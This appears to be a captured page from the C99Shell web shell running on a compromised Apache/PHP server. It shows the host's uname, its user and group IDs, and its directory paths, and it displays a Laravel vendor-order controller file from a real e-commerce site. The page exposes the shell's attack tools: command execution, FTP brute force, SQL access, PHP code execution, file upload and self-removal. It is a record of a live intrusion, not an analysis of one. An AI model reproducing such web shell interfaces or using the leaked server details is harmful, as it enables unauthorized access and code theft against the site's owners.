!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/app/Http/Controllers/Vendor/   drwxr-xr-x
Free 27.09 GB of 117.98 GB (22.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     VendorOrderController.php (11.07 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package VendorOrderController
 * @author TechVillage <support@techvill.org>
 * @contributor Sakawat Hossain Rony <[sakawat.techvill@gmail.com]>
 * @created 19-01-2022
 */
namespace App\Http\Controllers\Vendor;

use 
App\DataTables\VendorOrderDataTable;
use 
App\Exports\VendorOrderListExport;
use 
App\Http\Controllers\Controller;
use 
Illuminate\Http\Request;
use 
App\Services\Actions\OrderAction;
use 
Modules\Refund\Entities\RefundReason;
use 
App\Services\Mail\UserInvoiceMailService;

use 
App\Models\{
    
Order,
    
OrderDetail,
    
OrderStatus,
    
OrderStatusHistory,
    
OrderStatusRole,
    
OrderNoteHistory,
    
Preference
};
use 
ExcelDBAuth;

class 
VendorOrderController extends Controller
{
    
/**
     * vendor order list
     *
     * @param VendorOrderDataTable $dataTable
     * @return mixed
     */
    
public function index(vendorOrderDataTable $dataTable)
    {
        
$data['statuses'] = OrderStatus::getAll()->sortBy('order_by');
        return 
$dataTable->render('vendor.orders.index'$data);
    }

    
/**
     * vendor order view
     *
     * @param $id
     * @return \Illuminate\Contracts\Foundation\Application|\Illuminate\Contracts\View\Factory|\Illuminate\Contracts\View\View|\Illuminate\Http\RedirectResponse
     */
    
public function view($id)
    {
        
$vendorId session()->get('vendorId');
        
$order Order::where('id'$id)->where('id'$id)->whereHas("orderDetails", function ($q) use ($vendorId) {
            
$q->where('vendor_id'$vendorId);
        })->
with('orderDetails')->first();
        if (!empty(
$order)) {
            
$data['order'] = $order;
            
$data['vendorId'] = $vendorId;
            
$data['refundReasons'] = RefundReason::where('status''Active')->get();
            
$data['finalOrderStatus'] = Order::getFinalOrderStatus();
            
$data['orderStatus'] = OrderStatus::whereHas("orderStatusRole", function ($q) {
                
$q->where('role_id'2);
            })->
orderBy('order_by''ASC')->get();
            
$data['orderStatusHistories'] = OrderStatusHistory::join('products''products.id''order_status_histories.product_id')
                ->
select('order_status_histories.*')
                ->
where(['order_id' => $id'vendor_id' => $vendorId])
                ->
orderByDesc('id')
                ->
get();
            
$data['orderNotes'] = OrderNoteHistory::where(['order_id' => $id'user_id' => auth()->user()->id])->orderBy('id''desc')->get();
            
$data['orderAction'] = new OrderAction;
            return 
view('vendor.orders.view'$data);
        }
        return 
redirect()->back();
    }

    
/**
     * change status
     *
     * @param Request $request
     * @return array
     */
    
public function changeStatus(Request $request)
    {
        
$finalOrderStatus Order::getFinalOrderStatus();
        
$data['status'] = 0;

        if (isset(
$request->data['type']) && $request->data['type'] == 'download') {
            
$order Order::where('id'$request->data['order_id'])->first();

            if (!empty(
$order)) {
                return 
$order->revokeAccess($request);
            }
        }

        
$downLoadData json_decode($request->data['download_data']);
        
$downloadArray = [];

        if (
is_array($downLoadData) && count($downLoadData) > 0) {
            
$order Order::where('id'$request->data['id'])->first();
            
$order->downloadDataMerge($downLoadData);

            if (empty(
$request->data['status_ids'])) {
                return [
'status' => 1'message' => __('The :x has been successfully saved.', ['x' => __('Order')])];
            }
        }

        if (empty(
$request->data['status_ids'])) {
            return [
'status' => 0'message' => __('No changes found.')];
        }

        try {
            
DB::beginTransaction();

            foreach (
$request->data['status_ids'] as $detailId => $statusId) {
                
$orderDetail OrderDetail::where('id'$detailId)->first();
                if (empty(
$orderDetail) || $orderDetail->is_delivery == 1) {
                    continue;
                }
                if (
$statusId != $finalOrderStatus || ($statusId == $finalOrderStatus  && strtolower(optional($orderDetail->order)->payment_status) == "paid")) {

                    if (
$statusId == $finalOrderStatus) {
                        (new 
OrderDetail)->updateOrder(['order_status_id' => $statusId'is_delivery' => 1'is_on_time' => $orderDetail->isInTime()], $orderDetail->id);
                    } else {
                        (new 
OrderDetail)->updateOrder(['order_status_id' => $statusId], $orderDetail->id);
                    }

                    
$history['user_id'] = Auth::user()->id;
                    
$history['order_id'] = $orderDetail->order_id;
                    
$history['product_id'] = $orderDetail->product_id;
                    
$history['order_status_id'] = $statusId;
                    (new 
OrderStatusHistory)->store($history);
                    
$checkAllStatus OrderDetail::where('order_id'$orderDetail->order_id)->whereHas("orderStatus", function ($q) {$q->where('slug''!=''cancelled');})->pluck('order_status_id')->toArray();
                    
$checkAllStatus array_unique($checkAllStatus);

                    if (
count($checkAllStatus) == 1) {
                        if (isset(
$checkAllStatus[0])) {
                            
$order Order::where('id'$orderDetail->order_id)->first();
                            if (
$order->order_status_id != $checkAllStatus[0]) {
                                (new 
Order)->updateOrder(['order_status_id' => $checkAllStatus[0]], $orderDetail->order_id);
                                
$history = [];
                                
$history['order_id'] = $orderDetail->order_id;
                                
$history['note'] = "System Generated";
                                
$history['order_status_id'] = $statusId;
                                (new 
OrderStatusHistory)->store($history);
                            }
                        }
                    }

                    
//commission
                    
if (isActive('Commission')) {
                        (new 
order)->orderCommission($orderDetail->id$statusId);
                    }

                    
$data['status'] = 1;
                }
            }
            
$data['message'] = __('The :x has been successfully saved.', ['x' => __('Order')]);
            
DB::commit();
        } catch (
Exception $e) {
            
DB::rollBack();
            
$data['message'] = __('Something went wrong, please try again.');
        }

        return 
$data;
    }

    
/**
     * check vendor order status
     *
     * @param $statusId
     * @return bool
     */
    
public function isOrderStatusEnable($statusId)
    {
        
$orderStatus OrderStatusRole::getAll()->where('role_id'2)->pluck('order_status_id')->toArray();
        if (!empty(
$orderStatus)) {
            return 
in_array($statusId$orderStatus);
        }
        return 
false;
    }

    
/**
     * order list pdf
     * @return html static page
     */
    
public function pdf()
    {
        
$vendorId session()->get('vendorId');
        
$data['orders'] = Order::whereHas("orderDetails", function ($q) use ($vendorId) {
            
$q->where('vendor_id'$vendorId);
        })->
with('orderDetails')->get();

        return 
printPDF(
            
$data,
            
'order_lists' time() . '.pdf',
            
'vendor.orders.pdf',
            
view('vendor.orders.pdf'$data),
            
'pdf'
        
);
    }

    
/**
     * order list csv
     * @return html static page
     */
    
public function csv()
    {
        return 
Excel::download(new VendorOrderListExport(), 'order_lists' time() . '.csv');
    }

    
/**
     * order invoice print
     *
     * @param Request $request
     * @param $id
     * @return \Illuminate\Contracts\Foundation\Application|\Illuminate\Contracts\View\Factory|\Illuminate\Contracts\View\View|\Illuminate\Http\RedirectResponse|void
     */
    
public function invoicePrint($id)
    {
        
$vendorId session()->get('vendorId');
        
$order Order::where('id'$id)->where('id'$id)->whereHas("orderDetails", function ($q) use ($vendorId) {
            
$q->where('vendor_id'$vendorId);
        })->
with('orderDetails')->first();
        if (!empty(
$order)) {
            
$data['order'] = $order;
            
$data['vendorId'] = $vendorId;
            
$data['logo'] = Preference::getAll()->where('field''company_logo')->first()->fileUrl();
            
$data['orderAction'] = new OrderAction;
            
$data['user'] = $order->user;
            
$data['orderStatus'] = OrderStatus::getAll()->sortBy('order_by');
            
$data['type'] = request()->get('type') == 'print' || request()->get('type') == 'pdf' request()->get('type') : 'print';
            if (
$data['type'] == 'pdf') {
                return 
printPDF($data$order->reference '.pdf''vendor.orders.invoice_print'view('vendor.orders.invoice_print'$data), $data['type']);
            } else {
                return 
view('vendor.orders.invoice_print'$data);
            }
        }
        return 
redirect()->route('vendorOrder.index');
    }

    
/**
     * Store note
     *
     * @param Request $request
     * @return json $response
     */
    
public function storeNote(Request $request)
    {
        
$user['user_id'] = auth()->user()->id;
        
$data array_merge($request->data$user);

        
$validator OrderNoteHistory::storeValidation($data);
        if (
$validator->fails()) {
            
$response['status'] = 0;
            
$response['error'] = $validator->errors()->first();
            return 
$response;
        }
        if (
$response = (new OrderNoteHistory)->storeData($data)) {
            
$date timeZoneFormatDate($response->created_at) . ' ' timeZoneGetTime($response->created_at);
            return [
'status' => 1'date' => $date'message' => __('The :x has been successfully saved.', ['x' => __('Note')])];
        }

        return [
'status' => 0'message' => __('Something went wrong.')];
    }

    
/**
     * Order Action
     *
     * @param Request $request
     * @return json $response
     */
    
public function orderAction(Request $request)
    {
        if (
$request->data['action_val'] == 1) {
            
$order Order::find($request->data['order_id']);
            if (
$emailInfo = (new UserInvoiceMailService)->send($order)) {
                return [
'status' => 1'message' => $emailInfo['message']];
            }
        }

        return [
'status' => 0'message' => __('Something went wrong.')];
    }

    
/**
     * grant access
     *
     * @param Request $request
     * @return int[]
     */
    
public function grantAccess(Request $request)
    {
        
$orderId $request->order_id;
        
$order Order::where('id'$orderId)->first();

        if (!empty(
$order)) {
            return 
$order->grantAccess($request);
        }

        return [
'status' => 0];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--